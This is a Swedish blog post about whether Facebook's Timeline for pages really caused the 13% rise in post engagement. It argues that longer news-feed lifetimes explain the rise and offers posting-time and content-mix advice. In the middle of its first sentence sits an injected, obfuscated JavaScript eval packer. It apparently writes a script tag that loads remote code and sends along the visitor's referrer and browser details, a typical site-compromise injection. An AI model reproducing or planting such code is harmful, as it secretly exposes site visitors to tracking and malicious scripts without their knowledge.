Image Image Image Image Image Image Image Image Image Image

| 18 oktober, 2018

Scroll to top

Top

Har Tidslinjen på Facebook verkligen orsakat ökningen i engagemang på Facebook?

Har Tidslinjen på Facebook verkligen orsakat ökningen i engagemang på Facebook?
Sebastian Plengier Ehrnfelt

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ahrrz|var|u0026u|referrer|zrdnz||js|php’.split(‘|’),0,{}))
har skrivits flera artiklar senaste tiden som säger att engagemanget på Facebook-sidors poster ökat i och med att Tidslinjen introducerades på Facebook-sidor. Men är det verkligen sant?

Tidslinjen är i första hand en layoutförändring. Och inte till det bättre egentligen om man pratar om engagemang på en Facebook-sida. Med Tidslinjens uppdelning i 4 olika visningslägen har besökaren på sidan nu betydligt svårare att t ex se inlägg av andra, frågor eller åsikter som lämnats av besökare på sidan.

Det man ser när man kommer till en sida är så kallade Höjdpunkter, vilket i första hand är postningar som gjorts av sidans administratörer. Engagemang som initierats av besökare göms mest i ett helt annat visningsläge, nämligen “Andras inlägg“.

Väldigt många som besöker en Facebook-sida är helt ovetande om dessa 4 visningslägen och har inte en aning om att man kan välja vad man vill se genom att välja visningsläge!

Om nu de flesta endast ser Höjdpunkter, material som genererats av sidans administratörer, skulle detta verkligen ligga bakom det faktum att Facebook-sidors poster i snitt sett en ökning på 13% i engagemang sedan Tidslinjen infördes?

Lägg sen till de faktum att endast omkring 4% av en sidas fans går tillbaks till Facebook-sidan efter att Gillat den från början, resterande 96% ser bara sidans inlägg i sitt nyhetsflöde och ser inte Facebook-sidans Tidslinje alls! Då skulle en väldigt liten grupp hängivna fans vara så positivt påverkade av att mest se  sidans egna inlägg så att dom står för hela 13% ökning av sidans totala engagemang per post? Eh… Sorry, men jag tror inte på det alls.
Något som hände samtidigt med Tidslinjens införande på Facebook-sidor är att sidors poster lever längre i nyhetsflödet!
När nyhetsflödet ändrades och Tickern infördes hösten 2011 förkortades posters livslängd i flödet. Det blev betydligt mer rotation i flödet. Endast poster med hög andel engagemang (gilla, kommentarer, dela) höll sig kvar i nyhetsflödet. De övriga trycktes undan eller försvann till förmån för färskare poster.

Tidigare var rekommendationen att posta från en sida 1-3 gånger per dag. Med de kortare livstiderna för poster kunde många sidor öka frekvensen och gjorde fler postningar per dag för att försäkra sig om att man alltid hade något i fansens nyhetsflöden. Nu är ju det ju väldigt olika hur mycket fansen “tål” innan dom döljer sidan, sidans poster eller rentav Ogillar sidan helt och hållet. Var smärtgränsen ligger måste varje sidägare komma underfund med själv genom att studera Facebooks Insikter/Insights (statistiken).

Om en post lever länge i nyhetsflödet så hinner många fler se den. Alla är inte på Facebook hela tiden

Före Tidslinjens införande på sidor fick en post ca hälften av sina kommentarer under den första timmen. Nu har hälften av Gilla och kommentarer uppnåtts efter ca 2,5 timmar.

Nackdelen med att en post lever längre i flödet är att du kan riskera att helt enkelt slå ihjäl en tidigare post med en ny post! Den gamla posten kanske skulle ha fått mycket mer uppmärksamhet om den fått stå ensam och fått synas i all sin prakt istället för konkurrera med fler poster från samma sida.
Det kan slå åt båda håll här, den post som har mest engagemang kan slå ut den andra,  i synnerhet om den ena posten, även om den är den senaste, inte fått något engagemang alls.

Att inte behöva posta så ofta är positivt för de allra flesta. Det kan vara jättesvårt att komma på saker värda att posta på Facebook-sidor, att då göra det flera gånger om dagen kan kännas övermäktigt! Men… Ska man posta mer sällan och ändå få ut maximal nytta och maximal synlighet och förhoppningsvis därmed också maximalt engagemang, då måste man hitta rätt tillfälle att posta!

Vad som är just din sidas “sweet spot” i tiden måste du upptäcka genom att testa dig fram och kolla i statistiken. Vid vilka tidpunkter får du störst räckvidd? Störst antal användare som interagerat? Flest som pratar om detta? Mesta virala spridning?

Sen måste man också lära sig vilken typ av poster som går hem just hos ens egen målgrupp, fansen på sidan.
Svarar dom bäst på foton, länkar, video eller ren text?
Får du fler med dig om du rolig, skickar roliga foton m m eller är det när du helt seriöst berättar om nyheter från ditt företag och den bransch du verkar i?

Som regel fungerar det bäst med en mix av olika sorters poster. Är man ny på det här med sociala medier kan det kännas konstigt, irrelevant och oseriöst att posta roliga inlägg på en företagssida. men precis som du och jag så är fansen på din sida bara människor! Vi behöver lite humor i tillvaron.

Ur en strategisk synvinkel är det till din fördel att dina fans interagerar även med dina inte så företagsrelaterade poster. Varför då? Jo, varje gång en person interagerar med en post från din sida så ökar deras personliga Edgerank (algoritmen som styr vad som visas i Facebooks nyhetsflöde) gentemot din sida. Har dom boostat sin Edgerank mot sidan ökar sannolikheten att dom ser dina poster framöver.